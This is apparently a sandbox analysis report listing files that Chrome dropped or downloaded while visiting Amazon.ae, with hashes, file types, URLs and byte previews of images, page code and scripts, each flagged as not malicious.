                                                                                                                                                                                                                                                                SHA-512:11B7637AE264FFF28643254315D6923E0143A351CD1FF00ADF7CB99C3A2CA1546F7E522838F22BC59874C440C1FC5E6849C673A66D8B93B4C9A86B4116BA2758
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........0.......................................................................2..E...<..Jv..u...J(.g.!.Q.d..............46.|.'.]...OI...KT.D..b(........=f;,d..............%.A...@\..woq.q{z..!.".7...K.......................V....j.hk....VC....#.=+q$[.W.c.GOJ..*DZ...................95..JZ.....y.J%(.@C..'..u.Pi..d...y.=..c]...o...}6,.............U..y.. .......3qJ......+Z.z...,Q...o..^..../v.y...)Y.l...Ob:"..........1.qM..|...y=.KN..NU.4#.}....U...A....$.CZ.s...tK.6mHAi.N........s..Lda..h..,+.M2%.8.X..n.v2 ...P....T.G....L..............`WeXM....J..J..z.V.D...q............1.R.L......yi............(ij.j........)u..\E.v..W.`...ry`.....d.mr.U.$..hu."...........C.R....jO..qDP"h!........y:.R.].... L^.y$.j...d............s.TqS.\..<...ho.....,...bMp#.sj.........Vs^.............1...^.M5.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 13 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):538
                                                                                                                                                                                                                                                                Entropy (8bit):7.363900406422438
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:6v/7r/6TBLr8CzfiF2PuKoSpH/geL6Ou4zlWkqMlMQn9inLjj5N:i/6FLlzu8kSdg3GNqMlGr5N
                                                                                                                                                                                                                                                                MD5:3920E1FFC5AB160D1D7F18D8D6303633
                                                                                                                                                                                                                                                                SHA1:53390E776D482DB9E85814A752276F517523724C
                                                                                                                                                                                                                                                                SHA-256:3F8C75CC2824A1CE825FF2623763046C497B7D06587C14A07FD775F7506BCDA5
                                                                                                                                                                                                                                                                SHA-512:5F368C2EFCA94B7021CC693CE95C9A598EEAAFF83072E2D14FF6A6EFE272A07B9301536237EE263E398D87CBE1E72879D11CC6EB443211C99118FB88E85CF35C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...................pHYs.................tIME.......}.......bKGD..............IDAT8...n.0.E.V....J...@..........f&...'@.[.202..d...$*[:"..Vv..Z.z..N.....V.q6....P.X,.r.,;E.....L.S..#.c..y.=.'..h.).....!.....`.........BR....#.)PdP... ....4............:.f.Z.....4...A..<..y.....N.....,..\.!.L..v...1]...d...t....*i..5.A....(.......O,..E.o...RM.....h4..j.*..JU.\/t..j/P.$........z=...C..&y...z-.9b..*!B..(...=U...B.J..M..,!n..............!u...x+.u.B'....=...j..O..{.E.*~{...j...?......J.T....IEND.B`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4035
                                                                                                                                                                                                                                                                Entropy (8bit):7.887791855059402
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TnzkqGK9tMl3lLlCvzzJl/pl8L4RMU3HacdXkj1sx/Zwq1jU2tB1:HkqGKXuK5lhOA3HRtMU/+q1X
                                                                                                                                                                                                                                                                MD5:36630394D0976668EDE4013364A43CD0
                                                                                                                                                                                                                                                                SHA1:0A2772D8C9AFE96DFAE6BA9AC1FC6AC54C08C014
                                                                                                                                                                                                                                                                SHA-256:E3107CD4F9FC9366CF5B47E98F6B75067D8534B331AAE47EEB85847CDEFD28CE
                                                                                                                                                                                                                                                                SHA-512:FD8CF0579F6AB0E88783861CC8E540EA3385284E080129950CBCA46E6406CD894E34AC404341BD7A05FA88EB49C7E8E5EE8A7EF3D843FF727CB69C34D3C7ABC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!12A..."Qq.....#BRSab.....3Cs...$Tr.%5D.cd..................................................!.12QR..3Aq"#.............?..-......$..+.n'.8Ei...h...L...t...B...MuYN.q.C..*........Y=.z.{....U....eG...o.9.o.W..._..ck..z..Oa...{....>..s...ck..z....W..^....}..PK...S...o.9...W....]....}.A..C.*...C.)........W.+..z..W.+..z.<'.we8G...q....6.].............]#........N8<}.0....9d....u_.....p.a....)........E.t:O}.{....Z....)WI.....L....9..G...u.j.f DE.............'.=..O>..X.4.Ax*.V6..;.]....A.......:..l....i.J......qv].....:4W..mX.y:..m}..m....!......V...{K.ld..q..Z.8A%..+]..F.......k.H&..G#HsHu.....^..=..`9..A.$....K.<N&z.s.?l..sn..b.5..`CAZ.FpNxi.r..=.u.6.`...9..,.o.=..6...*3\.....N.k&:......R.2P...n......0).x.1......S....4..1.o.{Z......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7832), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7832
                                                                                                                                                                                                                                                                Entropy (8bit):5.765479416136882
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KThaKraoaw2aKSI160JTXNJ2RgqD92+QTDJ0GvcbsdaS:KThF3H2FSI160Jbggqg/7mS
                                                                                                                                                                                                                                                                MD5:6A32C93996AB90594D00E890E9A55400
                                                                                                                                                                                                                                                                SHA1:73A897EF18E6CE3012F6C3FB5CA37B52275D132B
                                                                                                                                                                                                                                                                SHA-256:579ED5B726F10A70534AE113AE71D4D44D0B49BEBB22A4ECD4927B1FED9D748D
                                                                                                                                                                                                                                                                SHA-512:BE895A606E26AEAD4B7E966AF7B86EEA93922AF05D11E9B72CFAB7AE1611B8113B4F9A0A45860ADB935DDDB833B79FC777333D6C321C6DA3463158F060116792
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,m,n,o,y,z){V=b,function(c,e,U,f,C){for(U=b,f=c();!![];)try{if(C=parseInt(U(357))/1+-parseInt(U(321))/2+parseInt(U(349))/3*(-parseInt(U(358))/4)+parseInt(U(356))/5+parseInt(U(380))/6*(-parseInt(U(404))/7)+parseInt(U(377))/8*(parseInt(U(410))/9)+parseInt(U(338))/10*(parseInt(U(414))/11),e===C)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,857972),g=this||self,h=g[V(335)],m=function(a0,e,f,C){return a0=V,e=String[a0(348)],f={'h':function(D){return null==D?'':f.g(D,6,function(E,a1){return a1=b,a1(386)[a1(418)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(387)];Q+=1)if(R=D[a2(418)](Q),Object[a2(365)][a2(420)][a2(389)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(365)][a2(420)][a2(389)](H,S))J=S;else{if(Object[a2(365)][a2(420)][a2(389)](I,J)){if(256>J[a2(406)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(323)](F(O)),O=0):P++,G++);for(T=J[a2(406)](0),G
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469053776&rand=851829
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (14498)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):333586
                                                                                                                                                                                                                                                                Entropy (8bit):5.689843407699669
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:7Tf6xF4eOFB9+GPiUkmJUR6ItXnf9cHTFabvLsAEbRUm21FeBIx:7Tf3sGPiz3R6ItXnf99vLQbRUmGFv
                                                                                                                                                                                                                                                                MD5:E4E58D938DF82A6541FFE6F6E8416887
                                                                                                                                                                                                                                                                SHA1:EAE7E13DA992DC240D92205EE436FB858C190B76
                                                                                                                                                                                                                                                                SHA-256:BE318DA14DDACB9775692325D22F3447D641C92DB82189174CE60F396EAA26BA
                                                                                                                                                                                                                                                                SHA-512:2ACB1D809C3BBBF5FE5B42CC51E80F1BE25BA8151576D3FD9AABF2BFB136998002865AE4B53A5426DC5A3EB8D2DA134F36EC9A850E52D1F67EBAA826E3A96174
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_lang
                                                                                                                                                                                                                                                                Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (391)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2073
                                                                                                                                                                                                                                                                Entropy (8bit):5.5217451089062894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:uQtgok9mgoksITlvsduD3uD1uD1uDs+gEvW2oNo/OcXRsaRdOXduSYpSzJS:uQ+3f3lh0UDeDsDsD8EO3+/OciaRdYJe
                                                                                                                                                                                                                                                                MD5:07F3BBAE3312B76D3A76B274E03D3F0C
                                                                                                                                                                                                                                                                SHA1:2D85782448AD21736AA6093D3FC5D02C48A91591
                                                                                                                                                                                                                                                                SHA-256:C47691A714391803F4A58CB0400DB014EF031FA64EA282235BE2035299707EEB
                                                                                                                                                                                                                                                                SHA-512:C93FE5EAD1424F7D4632799DE34AD06A35E23763E28142E7A0A4337F430F0E43D3AC858B4B518945DF89E0CD0FA174462F12A594D5791BBDD120E4FD84418106
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://static.siege-amazon.com/prod/profiles/AuthenticationPortalSigninEU.js
                                                                                                                                                                                                                                                                Preview:(function(f) {. var haveAUI = typeof P !== 'undefined' && P.AUI_BUILD_DATE;. if (typeof SiegeCrypto !== 'undefined') {. if (haveAUI) {. P.now('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', function(lib) {. return f(lib || SiegeCrypto);. });. } else {. f(SiegeCrypto);. }. } else if (haveAUI) {. P.when('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', f);. } else {. var err = new Error('CSE library not loaded, and no AUI');. try {. ueLogError(err, {attribution: 'siege-cse:profile:AuthenticationPortalSigninEU', logLevel: 'WARN'});. } catch (e) {. throw err;. }. }.})(function(SiegeCrypto) {..SiegeCrypto.addProfile("AuthenticationPortalSigninEU", {. "password": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordCheck": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordNew": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):23935
                                                                                                                                                                                                                                                                Entropy (8bit):7.9567963538763715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Rn/PWgL+lgdcOOIv29xXCnuYuQkm0/cfLiuDyoMOffMm9lRPDYe3cZxYvrMxbWUj:d/PWg2gdvv2LIoQkm002Sy5OHflRPD3I
                                                                                                                                                                                                                                                                MD5:11DE20EF12F31D44FC9B3B3B3707B94D
                                                                                                                                                                                                                                                                SHA1:2C9553D8ACF74BF89215248F9458C61808652B58
                                                                                                                                                                                                                                                                SHA-256:9ABEC7331C5D937F16D039134BCDFB411E68F4F471C70EB2D8B231B07BE702B0
                                                                                                                                                                                                                                                                SHA-512:8F0C997672F93C2354AE2E37EDAA045EB5648868FA71C8044AC2E850399EA237240AF87F2CD9B461495DD199B0ED3B7DEAA3BAC1DF41E77EF74B63CDEB3021CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41WmXJZiubL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................X....................................................................................................AI./.S.......E...q.......e................................Q..!..2.L..e...QK...0.H@...........0................@....;..\.\..+e.&..,.......m.zl..........v...s..}.............y....O..}.....aL]...Q..............`....v........+....`.....gL...vz...!}*u.JQS.. ....h.bA...V..........'.J"......K..4.......<.....kEM.|....~.8g.W.....*.;.E.=...pe{H.....].H.../.g&g:..=..y..J......g.....g..Rm..4.<..+.n}L..g%...+..V......../k.G....R...;......?...I.O;.f....).+....C.&.......#?.C)......fpk.......Y.........|..+.................@..... W.1K.N+.4...-.N.\.r...-mQ...E+../..\.^..kk.s....t..r.....=.....SOds..ASz...'.J-.w..'..M..*.I3...]u..*.?
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1943
                                                                                                                                                                                                                                                                Entropy (8bit):7.708840863704724
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rdBqdoYsrKFX8WFBZvI9/dBGn7dX8+cBpIHvMEQK:TLoYsMdbIbU7dbzkE3
                                                                                                                                                                                                                                                                MD5:D9060BE841CCBE9F731CC81DB21187E0
                                                                                                                                                                                                                                                                SHA1:309E8A9A5311A1968FC7BB5010FB60C1A79B2FE5
                                                                                                                                                                                                                                                                SHA-256:2D4D220FFF6C004F9BA48301752EE396F6D1FBC008790543B3A1A9DED64B65E4
                                                                                                                                                                                                                                                                SHA-512:F03A606E537A0795D5E55BDD6D03A2172F810A926F7552919E993D384FC29EBAB248C382D4450E479F8B6E0C7004EBB25BE97D7638D522C13FA4C02C97E1D42F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........~......................................................!1AQ.aq."R....#....B.23Dr............................................!............?..............5UQQ.-EC.qD._#...:..u..jd....dq.SL..$..........o..oc...J.......Ai.[o....%..7.p.?.7. .R..."." ""." ""." /@^-a..\.1d..r.... ....x=....s....}....Q.4...G*.[...3.w<~...}Ed..RG....`....S+d.(m.8.wX.;.b.w({>N..91VQ.Rh.....H..n.n......@k*.3_.l/$0..Oc.=.f.Ui;.w8........-..c.....Fr..i..2.......:r.?zV7.,.%.DD.D@DD.D@DD......=.{...b..&z.....3.%..e}....{.b.L...........y...=...*.kul.I.Z.*.......C.!...V....&..s.%.&w.I.!.m41.6..4..|B......;.M=..6;.Pu...c.`/*-...O.a.....i; ....z..../.4.......^...DD.D@DD.D@E....'o.....(......q......(}.-.._E@7..*#nKH..p. .;.%m..j.K...G?...6&.{.../...<....zf..P.f..)...HfK.Y..nr.WC.A.c..@..@....^...lN,..D.li3<z..aFMq....."..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12837
                                                                                                                                                                                                                                                                Entropy (8bit):7.925933554582985
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Nx4Eg7Rr1uZOnPxRrau2dbRH9fars8AuB5:NxVYuEPxRrau2JRdfarsFuB5
                                                                                                                                                                                                                                                                MD5:EBFD58FD11279463AAAE029072FECA9F
                                                                                                                                                                                                                                                                SHA1:15C4B3F458E74AEA09A95B88B270FDB973AB01F4
                                                                                                                                                                                                                                                                SHA-256:24F85FE3E165BF04E11FF2E6F875E62CCBF02BA4A80D1404B7537ED7C62B8A28
                                                                                                                                                                                                                                                                SHA-512:98BCE6C088E36E2034E4E6433AF9337FE38C1224B19F46327DCA25E918C8C09F41B259783427A7F10E33686BAB53D00C8E99D5FDBE4FBCBCF173357ACE47DD03
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61v-DUo-vZL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."......................................................................,......8h........4...pGs;DH..x.Q.......O....s.F.)$/.H 9....$...........#@...q.....^...-..3)<..OS3L.,..%".J...k...8E....)DP%.H...e..,.%..@......c.A.../p..[.."h....X.....;.w...yz.."...D.x.N...J...kY.,....K.....&.<.t,q.oW.7..He..k ......1.../.=g.Oi.....C3K0...T.....H.*.e....)....A..~q..l.5j..n...n..Z.8.A8.f..;[4..^.n'V<-R........(b..a./.f..W~b..{..KE.j.7.Z.n.*..54..x..s.t.7.m_....4 9...yc.....e..i.,.....~`...Q..........W.sP.....}.<......xGo3L.Rq......J..k.. s....-.y3..e.....P..m..........A ........./...a+)...OS3L.5y...p.lu{...,V.k..... ......\...@..k ......1.+.-2..NQ......c.....2.....N..^.[O/P.$R.........%Y.4k.6...{>....q...1.O\f}.@.y...I...d...........~O.>>{=...).434..8...8....ec..Z.t.Lf.u.A..^s...jU.T(.i....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Asi%26si%3D728%26pc%3D16650%26at%3D16650%26t%3D1723469060972%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16650
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8744
                                                                                                                                                                                                                                                                Entropy (8bit):7.89403623666893
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:EWfV2BSNoNVAn2vfrcIjJICAtiHpvCovSSZ0FLB4nL/:z2BCtRI1IT8HpvFSjdB4z
                                                                                                                                                                                                                                                                MD5:39F55DBD6DA30352041C6044273F5D95
                                                                                                                                                                                                                                                                SHA1:711289A718E92EB7329FFD26A05B714310C3CB5C
                                                                                                                                                                                                                                                                SHA-256:74E0560DCB790E003A2007F1B1CEF52A10CB7A3A29A84313B222FA99F8FC9B53
                                                                                                                                                                                                                                                                SHA-512:AA4D86DE66B6873D626EC37734FF3301C64121313219DCED1CA3E16A192C5418761CA0F505A314F56A544DDCE7B3DEB2C4A7DD7ED08E782973FB9ADE9A045AD2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........................................................................$=."2.8..$=..O...?...\K...x.%..P.x.x...4:7.K....p.RQ....9....f0....I...."l..kI. q.A.:....I.P..._7.5...W.4.....y~s..AkXg.....T....C..?V'.....H..#.f.z)...f.$..!$$..I^......B..!.r....B<... C..'C!..VXK..,...%..vFCHNhF.A6D....K...ft.O....@....KGrB..G.....S./.k.+.....N.<r.hm..^..7...\>..h...B....y.H..Z~r.....@.D..q.J.e..A.%.*oFq:.Q.D....B..X].%..%...@.*g.8.........03.#u1k=........Y.IvL9.....gUY...V..}...2...0.kF..s=.buy.9.nt.t>w..s....X".O....@.<...Vi*!..,e.6h+....=.[G".A.A..........%.Gj:.......Th..11.I.aH..p'..........)....b.'.Q...&..@.....1$.!.v...y.......47p.....Hp&...5.{.i"y_... ._NN4....r..p4.S#..1W...$.:F.Z..r@.$a.:A."..#-.... .bA...G...)......................1..A.!2Q. ".#3BaR...........v_G...z..v]........v_U..~..8....O.U
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2888
                                                                                                                                                                                                                                                                Entropy (8bit):7.842978756460343
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0roWxrlPJGl01IjIxdjgtD3vJJJf2JV9kxAzrt61BOdKSzZprdTtxYYrf:Tfyol01QOjadz4vkwrg1GKSnrSYrf
                                                                                                                                                                                                                                                                MD5:A54909D52FBD57BA68A0DF43AC219D29
                                                                                                                                                                                                                                                                SHA1:8D9EB27FD7B9D1FE02DB7EC842191372AC58FDE5
                                                                                                                                                                                                                                                                SHA-256:4516BA3CAC16BA45C50EF87FBFA5F95363A43B370D01F024E16229E16572E6FF
                                                                                                                                                                                                                                                                SHA-512:0967BB8343DF565E2D7622A6F2B073BC5B7D2CC988014C5E0945F751359895EC0AC7EAA3B9EE921456A3F51C8A39282A862FCCC3B13E6578E919FD03AB826AD2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Premium_1x._SY116_CB659039825_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!...1A.Q"2aq.#B..Sb..3..$CRr...................................................1A.!a.............?....(.)J.JR.R..8..8rG...\K..7,H...........a....H..a.|(...Qz...)..3....+{/..1..cN.."..a.....]>...f.w.....C.G.j.p?..qJ<,......s.."n..TgX..d....D...H..)@)JP.R......+....Df......!.7.7.....b.{/..."]...G5k..?*.cNn\.I..9.?...c.....;Q..u+.....F.fy#.......\?$........O.v5$..t2.G....1..'.+jp........bR..~w..@......}.7DcX.V..h..lo...56i.. ....f...Hc.....N{.U.-.JI.Ii-.Am....F.j...}d..{u3.!.Y@!...k]K.PDN.@..?Pm.6J. ..Q.....'=&.I..y.....k....g.[...._*.O..r.W..z..hx_..K;.[i#r....X....f5..)@)JP.R......0PY....v...5\8...0..y...HN2.....B.....}.|...T..U.Z..G.`.3`.?v......j..H.K..?.'o.a..5..n...Y....U......M;..O/MrWf.;.$....q.^...]<,.)...P./(=.$...5........;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
